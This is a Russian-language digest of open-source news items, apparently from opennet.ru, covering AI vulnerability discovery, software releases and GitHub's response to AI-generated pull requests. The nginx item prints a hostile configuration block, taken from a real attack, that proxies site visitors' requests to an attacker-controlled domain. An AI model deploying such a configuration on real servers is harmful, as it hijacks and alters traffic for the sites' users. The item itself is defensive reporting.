AI-модель Claude Opus 4.6 выявила более 500 ранее неизвестных уязвимостей

Для анализа уязвимостей были привлечены кодовые базы популярных открытых проектов, уже длительное время проходящие непрерывное fuzzing-тестирование в сервисе OSS-Fuzz. В отличие от fuzzing-тестирования, при котором генерируется поток всевозможных случайных комбинаций входных данных, AI-модель пыталась анализировать код, учитывая прошлые исправления для выявления похожих неустранённых ошибок, выделяя проблемные шаблоны и логически выводя, какие входные данные могут нарушить ход выполнения.

Информация о выявленных в ходе эксперимента уязвимостях уже начала передаваться сопровождающим, с которыми ведётся совместная работа по принятию исправлений. Чтобы помочь сопровождающим в ходе проведённой проверки вручную были разработаны патчи для исправления выявленных проблем. В качестве примера приведены три уязвимости в GhostScript, OpenSC и CGIF, которые на момент публикации устранены сопровождающими.

Используемая для выявления проблем конфигурация не была похожа на традиционные системы автоматического поиска уязвимостей - модели Claude Opus 4.6 был предоставлен доступ к виртуальной машине, в которой помимо исследуемого кода были установлены типовые инструменты разработчиков (coreutils, Python и т.п.) и утилиты для отладки и анализа уязвимостей (в том числе утилиты для fuzzing-тестирования). Модели не давалась чёткая инструкция по использованию данных инструментов и не предоставлялись специальные сведения о методах поиска уязвимостей. Модели была лишь поставлена задача и предоставлена возможность самостоятельно рассуждать об оптимальном использовании доступных инструментов.

Поиске уязвимостей в GhostScript AI-модель вначале попыталась провести fuzzing-тестирование, но когда это не привело к результату переключилась к анализу кода. Анализ кода тоже не дал результата и тогда модель начала изучать историю изменений в git и в одном из коммитов заметила упоминание проверки границ буфера. Разобрав коммит модель определила, что исправление добавляло недостающую проверку границ буфера при обработке шрифтов.

Далее модель определила код, который был до исправления и попыталась найти в остальном коде похожие шаблоны использования проблемной функции, остающиеся неисправленными. В итоге в файле gdevpsfx.c был выявлен вызов функции gs_type1_blend без проверки корректности значений. В финале модель подобрала содержимое файла, обработка которого приводила к аварийному завершению из-за записи данных в область памяти вне выделенного буфера.

В CGIF AI-модель отталкивалась от того, что при распаковке GIF-файлов библиотека рассматривала, что размер сжатых данных всегда меньше распакованных. Поиск уязвимости был сосредоточен на определении условий, при которых сжатые алгоритмом LZW данные окажутся больше распакованных. Подобные условия были найдены и AI-модель смогла сформировать GIT-файл, обработка которого привела к переполнению буфера. В OpenSC проблема была выявлена после анализа использования в коде потенциально опасных функций strrchr и strcat.

Отмечается, что языковые модели достигли уровня, позволяющего выявлять ранее неизвестные уязвимости, и в ближайшее время превзойдут экспертов по безопасности по скорости и масштабу поиска уязвимостей. Предполагается, что рост числа выявляемых уязвимостей потребует реформирования сложившихся процессов раскрытия информации, так как ныне выделяемых на исправление 90-дней будет недостаточно.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64760

Сопровождающий 16 модулей GNOME ограничит своё участие в проекте

В качестве причины переезда упоминается новая эммиграционная политика США (у Криса жена родом из Тибета). Крис был трудоустроен в Red Hat, но данная компания отклонила его просьбу сохранить должность после переезда во Францию, несмотря на предоставление доказательства наличия рисков для его семьи.

Cписок модулей, сопровождением и разработкой которых занимался Крис:

• GtkSourceView - библиотека для встраивания в приложения виджета многострочного редактирования текста, применяется во многих редакторах на базе GTK.
• Text Editor - основной текстовый редактор GNOME.
• Ptyxis - эмулятор терминала, по умолчанию используется в Fedora, Debian, Ubuntu, RHEL/CentOS/Alma/Rocky.
• libspelling - библиотека для использования в GTK-приложениях проверки правописания на базе пакета enchant2.
• Sysprof - система профилирования, интегрируемая с Linux perf, Mesa, GTK, Pango, GLib, WebKit, Mutter.
• Builder - интегрированная среда разработки.
• template-glib - шаблонизатор для GObject.
• jsonrpc-glib - библиотека для взаимодействия через JSON-RPC.
• libpeas - движок для создания плагинов на C, C++, Rust, Lua, Python и JavaScript.
• libdex - библиотека для отложенного выполнения задач и интеграции с io_uring.
• GOM - маппинг объектов GObject в SQLite.
• Manuals - просмотрщик документации.
• Foundry - реализация функциональности GNOME Builder для использования из командной строки и в форме библиотеки.
• d-spy - утилита для анализа соединений D-Bus.
• libpanel - виджеты для создания сложных IDE-подобных приложений на базе GTK и libadwaita.
• libmks - GTK-компоненты для отображения экрана и передачи событий мыши/клавиатуры при взаимодействии с виртуальными машинами на базе QEMU.

Опубликована мобильная платформа LineageOS 23.2

Выпуск LineageOS 23.2 примечателен сирхронизацией с актуальной кодовой базой из репозитория AOSP (Android Open Source Project), соответствующей второму квартальному обновлению платформы Android 16 (QPR2). Выпуск LineageOS 23.1 пропущен, так как AOSP теперь обновляется раз в полгода, а не раз в квартал. В дальнейшем промежуточные релизы LineageOS будут выпускаться не четыре, а два раза в год.

Из функциональных изменений в LineageOS 23.2 отмечается задействование нового оформления и цветовой схемы, соответствующих предложенной в Android 16 концепции дизайна Material Expressive 3. Приложения обновлены и по возможности также переведены на концепцию оформления Material Expressive. Среди прочего новое оформление задействовано в музыкальном проигрывателе Twelve (Music Player), часах Deskclock и калькуляторе ExactCalculator.

Обновлён интерфейс выпадающей панели с быстрыми настройками - плитки в панели теперь полностью настраиваются. В дополнение к базовой теме оформления предложена опциональная расширенная тёмная тема. Расширена функциональность утилит для работы с файлами. Для разработчиков прошивок предложено несколько новых утилит для извлечения RRO (Runtime Resource Overlay), обновления сертификатов приложений, извлечения правил SELinux и файлов конфигурации из системных образов.

Отдельно отмечена значительная переработка программы для управления обновлением прошивки (Updater), в которой полностью переделан интерфейс, улучшено управление обновлениями и добавлена анимация прогресса выполнения операций. Переделанный вариант Updater признан не готовым для включения в состав LineageOS 23.2, но он будет предложен в сроком времени после достижения должного уровня стабильности.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64758

Инициатива по встраиванию моделей машинного обучения в ядро Linux

Интеграция ML-моделей в ядро может быть полезной для изменения логики работы подсистем с учётом обрабатываемых данных, оптимизации работы и изменения конфигурации в зависимости от внутреннего состояния систем. Применение машинного обучения, способного выявлять закономерности и строить прогнозы без ручной реализации алгоритмов, упростит подбор наиболее эффективной конфигурации ядра c учётом сложности и изменчивости современных рабочих нагрузок, а также позволит решать такие проблемы, как предсказание сбоев систем хранения.

Помимо движка для выполнения моделей рассматривается разработка инструментов сбора данных для обучения ML-моделей, непосредственно обучения модели и тестирования результата. Так как для выполнения ML-модели требуются операции с плавающей запятой, а в ядре недопускается прямое использование FPU, предложенный прототип представляет собой прослойку для обращения из различных подсистем ядра к ML-моделям, выполняемым в пользовательском пространстве, по аналогии с выносом в пользовательское пространство обработчиков SPDK, DPDK и ublk.

Вынос выполнения и обучения модели в пространство пользователя упрощает сопровождение и изолирует ядро от проблем в коде выполнения модели. На стадии обучения данные о состоянии и параметрах ядра могут как запрашиваться обработчиком из пользовательского пространства, так и передаваться прослойкой, выполняемой на уровне ядра. Для управления взаимодействия компонентами в ядре и пользовательском пространстве применяется sysfs. Возможно адаптивное обучение ML-модели, при котором подсистема ядра получает рекомендацию от ML-модели, применяет рекомендуемое изменение и оценивает эффективность рекомендации по изменению состояния.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64755

Anthropic опубликовал Си-компилятор, созданный AI-моделью Claude Opus и способный собрать ядро Linux

Весь код и документация к компилятору сгенерированы моделью Claude Opus 4.6. Участие человека свелось к определению тестовых сценариев, которым должен удовлетворять итоговый продукт. Интерактивный режим для разработки, отладки и контроля над качеством не применялся, Модель Claude Opus сама выполнила всю работу на основе поставленной задачи. Ручное рецензирование корректности работы компилятора не проводилось, поэтому он не рекомендован для использования помимо экспериментов. Степень прохождения тестовых наборов компиляторов, включая GCC Torture Tests, составляет 99%.

Для разработки компилятора было привлечено 16 AI-агентов, которые после двух недель работы и около двух тысяч сеансов в Claude Code сгенерировали 100 тысяч строк кода на Rust, выполняющих задачу сборки ядра Linux 6.9 для архитектур x86, ARM и RISC-V. При генерации кода использовался новый режим работы "agent teams", позволяющий организовать параллельную работу нескольких AI-агентов Claude над одной общей кодовой базой, осуществляемую автономно без вмешательства человека. По стоимости доступа к API создание компилятора оценено в 20 тысяч долларов (передано 2 миллиарда входных токенов и сгенерировано 140 миллионов выходных токенов).

Компилятор самодостаточен и не требует внешних зависимостей, кроме стандартной библиотеки Rust. Все компоненты созданы с нуля, включая фронтэнд, промежуточное представление (IR) на базе SSA, оптимизиатор, генератор кода, ассемблер, компоновщик и генератор отладочной информации в формате DWARF. Форнтэнд совместим на уровне опций с GCC и может использоваться в качестве прозрачной замены GCC. На выходе генерируются исполняемые файлы в формате ELF. Поддерживается только платформа Linux (задача поддержки macOS и Windows не ставилась).

Из ограничений отмечается отсутствие раздельных уровней оптимизации (уровни с -O0 по -O3, -Os и -Oz приводят к одинаковой оптимизации), имеются проблемы с использованием _Atomic и _Complex, частично поддерживается ключевое слово __attribute__ и частично реализовано использование инструкций NEON. Помимо ограничений, описанных в подготовленной AI документации к компилятору, в статье с анонсом проекта упоминаются некоторые дополнительные проблемы:

• Отсутствие поддержки компиляции в 16-разрядном режиме (необходимый для загрузки ядра 16-разрядный код был собран в GCC).
• Ошибки в реализациях компоновщика и ассемблера (при подготовке демонстрации использовались GNU assembler и GNU linker).
• Claudes-c-compiler пока не готов заменить реальные компиляторы, так как не все проекты успешно собираются.
• Cтепень оптимизации генерируемого кода хуже, чем в GCC с отключением всех режимов оптимизации.
• Качество сгенерированного Rust-кода приемлемое, но заметно хуже чем код, подготовленный профессиональным программистом.
• Проект близок к потолку возможностей модели Opus 4.6 - попытки исправить ошибки или добавить дополнительные возможности, как правило, приводили к нарушению имеющейся функциональности.

Выпуск Wine 11.2

Наиболее важные изменения:

• В DbgHelp оптимизирована загрузка PDB-файлов.
• В crt (C runtime) добавлена поддержка выполнения конструкторов и деструкторов MSVC.
• Упрощена генерация версионированных ресурсов из переменных в makefile.
• Обновлены библиотеки libpng 1.6.54, libxslt 1.1.45 и libjpeg 10.
• Закрыты отчёты об ошибках, связанные с работой приложений: Bitcoin 0.3.21, Visual Basic 6, explorer.exe, Futuremark 3DMark Vantage 1.1.x, Alacritty, MilkyTracker, MMH7Editor, Pegasus Mail, Nexus Terminal.
• Закрыты отчёты об ошибках, связанные с работой игр: King of Dragon Pass, Imperivm: Great Battles of Rome, Black Mirror, The Hong Kong Massacre, Sam & Max Save the World: Culture Shock, Fifa 2005, 4Story, Divinity II: Developer's Cut, GTA: San andreas/Vice city, Shop Titans , Gothic 1, Kyodai Mahjongg, Codename Panzers Phase 1 и Codename Panzers Phase 2.

Выпуск свободного звукового редактора Ardour 9.0

Ключевые изменения:

• Добавлена возможность редактирования MIDI-региона в отдельном окне в стиле "пианолы" (pianoroll) или в панели в нижней части главного окна. Отдельное окно открывается при двойном клике и предоставляет интерфейс, похожий на основную шкале времени, но без лишних элементов интерфейса и с возможностью просмотра параметров MIDI-автоматизации.
• Добавлена поддержка прямого редактирования содержимого MIDI-клипов (MIDI Cue), используя отдельно открывающуюся область "пианолы" (pianoroll) с теми же операциями редактирования MIDI, что применяются на шкале времени.
• Добавлена поддержка прямой записи в cue-слоты для создания в реальном времени зацикленных композиций (лупов) в стиле приложений Live и Bitwig. Можно заранее задать длительность записи (например, "записать 4 такта") или записывать до остановки вручную. Запись воспроизводится со следующей точки квантования, например, с начала такта.
• Добавлена возможность применения плагина с эффектом только к указанному звуковому фрагменту (региону). Эффект привязывается к региону и сохраняется при перемещении региона по шкале времени.
• Реализовано отдельное окно с перцептуальным анализатором, визуализирующим спектр нескольких сигналов в режиме реального времени, поддерживающим наложение дорожек друг на друга и позволяющим оценить, какой вклад вносит каждая дорожка в общий микс в выбранном частотном диапазоне.
• Добавлен режим быстрого создания мелодий и ритмов. Например, при удержании клавиши Shift во время перемещения мышью MIDI-нот редактор теперь сам расставит ноты в соответствии с сеткой и настройками нот, а при удержании Shift+Alt будет использовано чередование нот.
  
  
• Реализовано управление MIDI-автоматизацией при помощи клавиатуры. Для добавления новых контрольных точек автоматизации, изменения их позиции и значения можно использовать модификаторы клавиш, клавиши управления курсором и Enter.
• Добавлена поддержка импорта и экспорта полос микшера (mixer strips). Полосы микшера можно экспортировать как локальные (уровня сеанса) или глобальные пресеты для повторного использования.
• На платформах Linux и Windows реализована поддержка взаимодействия с интерфейсом с использованием мультитач навигации.
• Обновлена панель приложений, которая реорганизована для каждого контекста. Специфичные для редактора опции перемещены в панель инструментов, а расширенные опции по умолчанию скрыты (изменить видимость можно в настройках Preferences > Appearance > Application Bar). В панель инструментов добавлены кнопки для управления показом левой, правой и нижней панелей.
• Переделана панель List в окне редактора, в которой упрощено переключение между двумя часто используемыми вкладками, которые можно закрепить в верхней части панели.
• Переделан диалог создания нового сеанса (New Session), в котором задействован интерфейс на основе вкладок, позволяющий быстро переключаться между созданием нового сеанса, открытием прошлого сеанса и открытием произвольного сеанса с диска.
• Обновлена область линейки (Ruler Area), в которой объединены несколько ранее обособленных линеек (с маркерами на основе диапазонов и местоположений), добавлены кнопки для навигации по маркерам и создания новых маркеров.
• Добавлена поддержка MIDI-файлов и регионов, длительность которых превышает MIDI-данные (например, 4‑тактовый сегмент, где последняя нота заканчивается перед концом 4 такта).
• По умолчанию при записи задействован WAV-совместимый звуковой формат RF64.

Защита от мусорных AI-изменений на GitHub. Оценка влияния вайб-кодинга на экосистему открытого ПО

В качестве краткосрочных путей решения проблемы рассматривается возможность быстрого удаления pull-запросов через web-интерфейс (удаления без оседания в истории вместо пометки закрытыми) и использование настраиваемых прав на отправку pull-запросов, позволяющих владельцам репозиториев разрешать передачу изменений только участникам, ранее вносившим изменения.

Из решений в долгосрочной перспективе упоминается расширение модели полномочий и предоставление сопровождающим инструментов для гибкого задания правил, определяющих кто имеет право создавать и рецензировать pull-запросы и каким требованиям должны соответствовать pull-запросы. Кроме того, предлагается задействовать AI для определения соответствия отправленного изменения правилам и стандартам качества каждого проекта (например, заданным в файле CONTRIBUTING.md), а также выявления и специальной пометки изменений, подготовленных при помощи AI.

Из высказанных в процессе обсуждения предложений также можно отметить создание фильтра, запрещающего отправку pull-запросов без предварительного открытия issue-обсуждений с пояснением причин реализации изменений, а также информирование сопровождающих о поступлении pull-запросов от новичков только после успешного прохождения тестов в системе непрерывной интеграции.

По статистике одного из ключевых разработчиков фреймворка genkit лишь одно из десяти изменений, подготовленных в AI, соответствует критериям для открытия pull-запроса. Один из участников проекта Azure Core Upstream подытожил основные опасения сопровождающих:

• Нарушение модели доверия при рецензировании - рецензирующие не могут быть уверены, что приславший изменение написал переданный код и понимает его суть.
• Сгенерированные в AI-ассистентах pull-запросы могут структурно выглядеть корректно, но быть логически неверными, небезопасными или непроверенными в работе.
• Практика построчного рецензирования остаётся обязательной, но она не может масштабироваться в условиях роста изменений, формируемых через AI-ассистенты.
• У сопровождающих возникает дискомфорт при принятии pull-запросов, которых они не полностью понимают, в то время как AI-ассистенты упрощают передачу крупных изменений без глубокого понимания.
• Повышается когнитивная нагрузка на сопровождающих, которые теперь должны не только проверять код, но и оценивать то, понимает ли его автор.
• Появление AI-инструментов не снизило, а увеличило нагрузку на сопровождающих.

Дополнительно можно отметить проведённое несколькими европейскими университетами исследование влияния вайб-кодинга на экосистему открытых проектов. Исследователи разработали модель равновесия экосистемы открытого кода, которая показала, что обратные связи, ранее отвечавшие за взрывной рост открытых проектов, после распространения вайб-кодинга создают обратный эффект - уменьшается число разработчиков готовых делиться кодом, сокращается разнообразие открыты проектов и снижается качество. Одним из вариантов решения проблемы упоминается внедрение модели финансирования, напоминающей Spotify, при которой AI‑платформы перераспределяют доходы от подписок на сервисы для разработчиков среди сопровождающих, в зависимости от степени использования проектов.

При вайб-кодинге разработчики перестают анализировать доступные решения, читать документацию, отправлять сообщения об ошибках и взаимодействовать с командами, развивающими открытые библиотеки. Открытые проекты теряют обратную связь с пользователям. Новым проектам становится сложнее пробиться, так как AI-ассистенты сами подбирают необходимые открытые библиотеки на основе информации, имевшейся на момент обучения модели. Из-за снижения прямого взаимодействия с пользователями страдает монетизация отрытых проектов, завязанных на услугах поддержки и показе рекламы/сборе пожертвований на сайтах. Из-за снижения обратной связи страдает качество. С другой стороны, вайб-кодинг повышает производительность труда при создании новых продуктов, основанных на чуждом коде, и упрощает внедрение новых библиотек.

Как пример приведён проект Tailwind CSS, число загрузок которого из репозитория NPM продолжает расти, но трафик к документации с начала 2023 года снизился на 40%, а доходы упали на 80%. Также отмечено снижение активности обсуждений на Stack Overflow примерно на 25%, спустя 6 месяцев после запуска ChatGPT.

Девятый экспериментальный выпуск среды рабочего стола Orbitiny

Из специфичных для Orbitiny возможностей отмечается: вызов действий через экранные жесты (очерчивание мышью определённого контура на пустой области рабочего стола); метки на пиктограммах (показываются для новых, изменённых, пустых или перемещённых через буфер обмена файлов, а также пустых каталогов); возможность вставки файла одновременно в несколько выбранных каталогов; поддержка размещения содержимого рабочего стола в любом каталоге (не только в $HOME/Desktop); использование отдельных десктоп-каталогов для каждого виртуального рабочего стола и монитора. Список типовых возможностей Orbitiny можно посмотреть в прошлом анонсе.

Среди изменений:

• В контекстное меню, вызываемое при клике правой кнопкой мыши на файле или каталоге, добавлена опция "Append to Clipboard", позволяющая прикрепить путь к выбранному файлу к уже имеющимся в буфере обмена файловым путям, чтобы потом разом скопировать файлы операцией "Paste".
• В контекстное меню добавлена опция "Paste to Image" для прикрепления помещённого в буфер обмена изображения к выбранному файлу c изображением (вертикально следом за имеющимся изображением).
• В контекстное меню добавлены опции "Add to Paste Basket" и "Paste to Basket". Первая опция позволяет добавить выбранные каталоги в набор каталогов, а вторая вставить файлы из буфера обмена в сформированный набор каталогов.
• Реализована операция "Image Join", позволяющая переместить мышью в режиме Drag&Drop одно или несколько изображений на другое изображение для их объединения в один файл. После перемещения выводится меню, позволяющее выбрать горизонтальное или вертикальное прикрепление изображений.
• Добавлен интерфейс для настройки параметров экрана и мониторов, таких как разрешение экрана и компоновка экранов в многомониторных конфигурациях.
• Добавлен интерфейс для управления яркостью экрана.
• Добавлена утилита orbitiny-screenshot-grabber для создания скриншотов.
• Функциональность копирования файлов (Orbitiny File Copier) и показа свойств файла (Orbitiny File Properties) вынесена в отдельные приложения, которые можно вызывать из скриптов для копирования группы файлов с показом индикатора прогресса и вывода информации о свойствах файла.
• В панель управления добавлена опция для переключения между выводом в форме списка и сетки пиктограмм.
• В обработчик действий в режиме Drag&Drop добавлена поддержка создания ярлыка открытия URL в web-браузере при перетаскивания URL на панель.
• В апплетах Application Menu, Drawer menu и Places Menu добавлены возможности для запуска элементов меню нажатием клавиши Enter и автоматического выделения элементов при поиске.
• В апплеты "Launcher", "Quick Launch" и "Drawer" добавлена опция для запуска с правами root.
• На рабочий стол по умолчанию добавлены ярлыки "Linux System", "Disks" и "Trash".
• Выполнено портирование с Qt 5.15.2 на Qt 6.10.1.

Поставка ОС Aluminium намечена на 2028 год. Поддержка ChromeOS сохранится до 2034 года

В Aluminium преимущественно используется архитектура и компоненты платформы Android, а интерфейс близок к развиваемому в ветке Android 16 десктоп-режиму для больших экранов, позволяющему одновременно работать с окнами нескольких приложений по аналогии с традиционной средой рабочего стола. При этом в платформе также задействованы отдельные системные сервисы, приложения, элементы прошивки, фоновые процессы и библиотеки из ChromeOS, а также перенесённый из Chrome OS интерфейс запуска приложений (Launcher). Из Android задействовано ядро Linux, GKI-модули (Generic Kernel Image), компоненты взаимодействия с оборудованием (HAL), Android Runtime, Android API, часть системных фоновых процессов и библиотек.

В марте состоятся детско-юношеские соревнования Linux-skills

С 1 марта по 10 марта 2026 года пройдёт онлайн отборочный этап, на котором участники пройдут тестирование. C 25 марта по 1 апреля 2026 года состоится финал - участникам будет предоставлен доступ к виртуальному стенду, на котором нужно будет настроить сеть и перевести рабочие станции с ОС MS Windows на Linux, после чего выполнить настройку Linux и сетей.

В соревнованиях используются дистрибутивы Simply Linux и Calculate Linux, OpenWRT на маршрутизаторах. Финал пройдёт очно на опорных площадках в Москве, Московской области (Щёлково) и Санкт-Петербурге. По запросу участников площадки могут быть организованы и в других городах.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64738

Nginx 1.29.4 с устранением уязвимости. Атаки, меняющие настройки nginx для перенаправления трафика

Помимо уязвимости в выпуске 1.29.5 снижен с "crit" до "info" уровень логгирования SSL-ошибок "ech_required", а также устранено несколько проблем: устранено обращение к уже освобождённой памяти (use-after-free) после переключения на следующий бэкенд gRPC или HTTP/2; решена проблема с отправкой некорректного запроса HTTP/2 после переключения на следующий upstream-сервер; исправлено разрастание размера ответа с несколькими диапазонами; налажено выставление переменной HTTP_HOST при проксировании к бэкендам FastCGI, SCGI и uwsgi.

Дополнительно можно отметить выявление автоматизированной атаки, которая после успешного взлома серверов ограничивается изменением конфигурации nginx. Взлом осуществляется через неисправленную уязвимость React2Shell в серверных компонентах React. Вносимые в конфигурацию nginx изменения перенаправляли запросы к обслуживаемым сайтам на сервер атакующих, который осуществлял подстановку вредоносных изменений в возвращаемый пользователю ответ.

   location /%PATH%/ {
       set $fullurl "$scheme://$host$request_uri";
       rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break;
       proxy_set_header Host [Attacker_Domain];
       proxy_set_header X-Real-IP $remote_addr;
       proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
       proxy_set_header X-Forwarded-Proto $scheme;
       proxy_set_header User-Agent $http_user_agent;
       proxy_set_header Referer $http_referer;
       proxy_ssl_server_name on;
       proxy_pass http://[Attacker_Domain];
   }

Таким образом вместо установки руткитов или вредоносного ПО на сервер, организована атака на клиентов, открывающих обслуживаемый на сервере сайт, без непосредственного изменения компонентов сайта на сервере. Атака в основном нацелена на перехват трафика доменов азиатских стран, а также доменов *.edu и *.gov. Через сервер атакующих перенаправляются выборочные запросы, например, содержащие в путях слова "pg", "pgslot", "slot", "game", "casino", "live", "help", "news", "page", "blog", "about", "support" и "info". Атака производится автоматизированно с использованием инструментария, выполняющего поиск и анализ конфигурации nginx, выбор и подстановку шаблона настроек, перезапуск nginx и проверку работы изменённого варианта.

Microsoft развивает открытую систему sandbox-изоляции Litebox

Идея "Library OS" в том, что сервисы операционной системы напрямую встраиваются в приложение вместо обращения к внешнему ядру ОС при помощи системных вызовов. В контексте Litebox к приложениям подключается изолирующая прослойка, предоставляющая минимальную платформу, транслирующую запросы к внешнему полнофункциональному программному интерфейсу. В качестве подобных внешних интерфейсов могут выступать ядро Linux, защищённые изолированные окружения OP-TEE (Open Portable Trusted Execution Environment), Webassembly-окружения или стандартная библиотека RustStd.

Формируемая через Litebox минимальная платформа применима для запуска приложений Linux, Windows и FreeBSD, вложенных ядер Linux и LVBS (Linux Virtualization Based Security). В качестве возможных областей применения Litebox упоминается обеспечения запуска немодифицированных Linux-программ в Windows, изоляция выполнения Linux-приложений на системах с ядром Linux, запуск программ поверх AMD SEV SNP для шифрования памяти, выполнение OP-TEE-программ в Linux и изоляция с использованием концепции LVBS.

Проект LVBS, представитили которого участвуют в разработке Litebox, развивает методы для защиты компонентов ядра Linux, использующие возможности гипервизоров и аппаратной виртуализации. Например, при помощи гипервизора могут изолироваться операции контроля подлинности модулей, верификации, управления доступом к паролям, ключам, структурам ядра и другим критически важным ресурсам. В случае эксплуатации уязвимости и компрометации ядра, атакующий не сможет получит доступ к подобным ресурсам, так как их обработчики выполняются вне текущего уровня привилегий. Litebox рассматривается контексте проекта LVBS как "безопасное ядро", защищающая обычное ядро гостевой системы при помощи аппаратной виртуализации.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64746

JetBrains переводит IDE IntelliJ на использование Wayland по умолчанию

Отмечается, что с момента прошлого тестирования прямой работы поверх Wayland в 2024 году, в реализации повышена стабильность работы поверх различных композитных серверов, добавлена функциональность drag-and-drop, обеспечена поддержка методов ввода и обеспечено естественно выглядящее декорирование окон. Из отличий поведения от сборки на базе X11 отмечается отсутствие центрирования или восстановления прошлого положения некоторых окон и диалогов, невозможность выноса некоторых всплывающих окон за пределы основного окна, отдельные несоответствия элементов декодирования окон (заголовок, кнопки управления оконном, тени, скругление углов) активной теме оформления рабочего стола.

Разработанный для IntelliJ Wayland-бэкенд WLToolkit открыт под лицензией GPLv2 и водит в состав JetBrainsRuntime (редакция OpenJDK). JetBrains также участвует в разработке проекта Wakefield, развивающего компоненты для поддержки Wayland в OpenJDK, позволяющие напрямую запускать графические Java-приложения в окружениях на базе Wayland.

Источник: https://www.opennet.ru/opennews/art.shtml?num=64745

В VirtualBox добавлена предварительная поддержка работы поверх гипервизора KVM

Начиная с коммита 5cb05ca, бэкэнд KVM находится в более или менее рабочем состоянии, по крайней мере для более "современных" гостевых систем. Старые и экзотические ОС, такие как MS-DOS, ещё не поддерживаются или не оттестированы. Если VirtualBox не может получить доступ к собственным драйверам ядра, он переключится на работу с использованием KVM, если он доступен. Сохранённые состояния между родным гипервизором и KVM должны быть совместимы. Тестовых сборок пока нет, и код доступен только в текущем GIT-срезе.

Реализованный бэкенд решит проблемы с запуском VirtualBox в дистрибутивах с поддержкой UEFI Secure Boot, таких как Fedora и RHEL, которые отказываются подписывать сторонние драйверы. Поддержка KVM также позволит запускать VirtualBox в Linux-системах, ещё не поддерживаемых в драйвере vboxdrv, использовать VirtualBox одновременно с другими системами виртуализации на базе KVM и задействовать расширенные механизмы аппаратного ускорения виртуализации, поддерживаемые в KVM, но не применяемые в VirtualBox (например, расширение APICv для виртуализации контроллера прерываний).

Источник: https://www.opennet.ru/opennews/art.shtml?num=64743

Выпуск набора утилит GNU Coreutils 9.10

Ключевые новшества:

• В man-страницах и подсказках, выводимых при указании опции "--help", обеспечено выделение жирным начертанием команд и опций, а также добавлена возможность привязи к командам гиперссылок для перехода на online-руководства на сайте gnu.org на поддерживающих такую возможность эмуляторах терминала.
• Изменено поведение утилиты timeout, которая теперь перехватывает обработку всех сигналов завершения процесса (SIGPIPE, SIGALRM, SIGHUP и т.п.) и перенаправляет их подконтрольному процессу, недопуская ситуацию, при которой утилита timeout может быть принудительно завершена, а подконтрольный процесс продолжит выполнение.
• В утилиту paste добавлена поддержка указания многобайтовых символов в опции "--delimiters".
• В утилите cp устранена регрессия, в некоторых ситуациях приводившая к бесконечному зацикливанию.
• На 3.2% сокращён размер исполняемого файла при унифицированной сборке, при которой предоставляется один общий для всех команд исполняемый файл "coreutils", а отдельные команды создаются через выставление символических ссылок на него. Добавлена опция "--enable-single-binary=hardlinks" для использования жёстких ссылок на единый исполняемый файл, а не символических.
• В утилиты 'stat' и 'tail' добавлена поддержка типа файловой системы "guest-memfd", который показывается в выводе "stat -f -c%T" и приводит к использованию полинга в "tail -f".
• В утилиту 'tail' добавлена опция "--debug".
• В утилиту 'du' добавлен короткий вариант опции "--apparent-size" - "-A", для совместимости с FreeBSD.
• В утилите 'du' в разделах с ФС Lustre до 9 раз ускорена обработка директорий, имеющих от 10 тысяч элементов.
• Прекращена сборка по умолчанию утилит 'kill' и 'uptime', которые теперь собираются только при указании в скрипте configure опции "--enable-install-program=kill,uptime".

Выпуск GCompris 26.0, обучающего набора для детей от 2 до 10 лет

Основные изменения:

• Реализован инструментарий для учителей GCompris-teachers, при помощи которого можно формировать собственные вопросники и контролировать успеваемость учеников по некоторым видам уроков.
• Добавлен новый урок "Рисующие колёса" (Drawing wheels), позволяющий рисовать узоры при помощи вложенных друг в друга вращающихся зубчатых колёс.
• Добавлен новый модуль "Вопросы с несколькими вариантами ответа", позволяющий проводить тестирование по вопросникам, подготовленным в интерфейсе для учителя.
• Обеспечен полный перевод на украинский, литовский и латышский языки, выполнены частичные переводы для русского (97%), грузинского (88%), азербайджанского (87%), эстонского (86%) и белорусского (83%) языков.

Выпуск офисного пакета LibreOffice 26.2

Ранее метка "Community" добавлялась, чтобы подчеркнуть, что сборка поддерживаться энтузиастами и не нацелена на применение на предприятиях. Несколько лет назад наименование LibreOffice Community было введено для более явного разделения с продуктами для предприятий семейства LibreOffice Enterprise, для которых партнёрскими компаниями предоставляется коммерческая поддержка, возможность получать обновления длительное время (LTS) и дополнительные функции, такие как SLA (Service Level Agreements). В конечном счёте решено убрать метку "Community", так как её наличие при загрузке сбивало с толку и вводило пользователей в замешательство - некоторые считали, что это только версия для некоммерческого применения, в то время как она была без ограничений доступна бесплатно всем без исключения, в том числе корпоративным пользователям.

Наиболее заметные изменения:

• Добавлена поддержка импорта и экспорта документов в формате Markdown, а также вставки текста с разметкой в формате Markdown через буфер обмена. При импорте документов Markdown возможно использование шаблонов ODT/DOCX для настройки внешнего вида.
• Проведена работа по повышению производительности и отзывчивости интерфейса при открытии, редактировании и сохранении больших файлов. Значительно ускорен экспорт в файлов в формате EPUB. Ускорена отрисовка форм и SVG-изображений с шаблонной заливкой.
• Улучшена совместимость с документами, созданными в проприетарных офисных пакетах. Улучшена поддержка открытых стандартов.
• В Linuх по умолчанию задействованы диалоги выбора цвета, предоставляемые библиотеками GTK и Qt, вместо специфичного для LibreOffice диалога. Изменить данное поведение можно через настройки "Tools ▸ Options ▸ LibreOffice ▸ General".
• Во всех диалоговых окнах задействованы вертикальные вкладки с пиктограммами.
• Добавлена опция для использования в диалогах горизонтальных вкладок вместо вертикальных.
• Добавлена возможность вставки гиперссылки через контекстное меню, показываемое для выделенного текста.
• В диалог создания скриншотов добавлена возможность копирования изображения в буфер обмена, а не только сохранения в файл.
• Предложен новый набор символов для пометки элементов в неупорядоченных списках. Обновлена библиотека изображений для неупорядоченных списков.
• На использование виджета IconView вместо ValueSet переведены диалог выбора темы оформления, боковая панель Layouts в Impress, а также пресеты и стили теней при настройке оформления границ страницы.
• Диалоги перехода к указанной странице, слайду или листу электронной таблицы переведены на работу в асинхронном режиме.
• Добавлена поддержка встроенных в документы шрифтов, лицензия на которые запрещает использование при редактировании (ранее подобные шрифты игнорировались, а теперь могут показываться при открытии документа в режиме только для чтения).
• Сборки для Linux теперь формируются для систем с архитектурой x86-64-v2 или новее.
